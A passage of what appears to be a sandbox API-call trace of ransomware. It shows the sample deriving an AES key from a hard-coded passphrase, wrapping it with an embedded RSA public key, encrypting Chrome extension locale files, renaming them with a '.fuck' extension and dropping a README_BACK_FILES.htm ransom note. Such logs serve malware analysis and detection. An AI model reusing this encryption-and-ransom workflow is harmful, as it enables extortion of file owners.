(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json", dwFileAttributes=0x0) returned 1 [0248.448] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.gsg")) returned 1 [0248.449] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.fuck")) returned 1 [0248.450] CryptDestroyHash (hHash=0x2938af8) returned 1 [0248.450] CryptDestroyKey (hKey=0x29387f8) returned 1 [0248.450] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.450] FindNextFileA (in: hFindFile=0x29389f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.450] FindClose (in: hFindFile=0x29389f8 | out: hFindFile=0x29389f8) returned 1 [0248.450] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\readme_back_files.htm")) returned 0xffffffff [0248.450] AreFileApisANSI () returned 1 [0248.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.451] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.451] GetFileType (hFile=0x5d50) returned 0x1 [0248.451] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.452] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.452] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0248.455] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.455] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.455] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.455] GetLastError () returned 0x0 [0248.455] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json")) returned 0x20 [0248.455] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json", dwFileAttributes=0x80) returned 1 [0248.455] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.456] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.456] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.457] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.459] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.459] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.459] CryptHashData (hHash=0x2938978, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.459] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938af8) returned 1 [0248.459] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.459] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.459] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293c600) returned 1 [0248.459] CryptImportPublicKeyInfo (in: hCryptProv=0x293c600, dwCertEncodingType=0x1, pInfo=0x2931410*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2931440*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2931448*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2936bb8) returned 1 [0248.459] CryptEncrypt (in: hKey=0x2936bb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.460] CryptEncrypt (in: hKey=0x2936bb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293c0b0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293c0b0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.460] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293c0b0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293c0b0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.461] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x104, lpOverlapped=0x0) returned 1 [0248.462] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x104, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0248.462] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0248.462] CloseHandle (hObject=0x5d58) returned 1 [0248.462] CloseHandle (hObject=0x5d5c) returned 1 [0248.462] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json"), bFailIfExists=0) returned 1 [0248.466] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json", dwFileAttributes=0x0) returned 1 [0248.466] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.gsg")) returned 1 [0248.467] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.fuck")) returned 1 [0248.468] CryptDestroyHash (hHash=0x2938978) returned 1 [0248.468] CryptDestroyKey (hKey=0x2938af8) returned 1 [0248.468] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.468] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.468] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0248.468] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\readme_back_files.htm")) returned 0xffffffff [0248.468] AreFileApisANSI () returned 1 [0248.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.469] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.469] GetFileType (hFile=0x5d50) returned 0x1 [0248.469] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.470] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.470] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0248.470] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.471] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.471] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.471] GetLastError () returned 0x0 [0248.471] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json")) returned 0x20 [0248.471] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json", dwFileAttributes=0x80) returned 1 [0248.472] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.472] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.473] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.473] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.476] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.476] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.476] CryptHashData (hHash=0x2938978, pbData=0x28cb508, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.476] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938af8) returned 1 [0248.476] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.476] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.476] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293c820) returned 1 [0248.476] CryptImportPublicKeyInfo (in: hCryptProv=0x293c820, dwCertEncodingType=0x1, pInfo=0x2931820*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2931850*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2931858*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2936c38) returned 1 [0248.477] CryptEncrypt (in: hKey=0x2936c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.477] CryptEncrypt (in: hKey=0x2936c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293c8a8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293c8a8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.477] WriteFile (in: hFile=0x5d58, lpBuffer=0x293c8a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293c8a8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.478] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe2, lpOverlapped=0x0) returned 1 [0248.479] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe2, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0248.479] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0248.479] CloseHandle (hObject=0x5d5c) returned 1 [0248.479] CloseHandle (hObject=0x5d58) returned 1 [0248.479] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json"), bFailIfExists=0) returned 1 [0248.482] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json", dwFileAttributes=0x0) returned 1 [0248.482] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.gsg")) returned 1 [0248.484] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.fuck")) returned 1 [0248.485] CryptDestroyHash (hHash=0x2938978) returned 1 [0248.485] CryptDestroyKey (hKey=0x2938af8) returned 1 [0248.485] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.485] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.485] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0248.485] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\readme_back_files.htm")) returned 0xffffffff [0248.485] AreFileApisANSI () returned 1 [0248.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3310, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.485] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.486] GetFileType (hFile=0x5d50) returned 0x1 [0248.486] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.487] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.487] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29389f8 [0248.488] FindNextFileA (in: hFindFile=0x29389f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.488] FindNextFileA (in: hFindFile=0x29389f8, 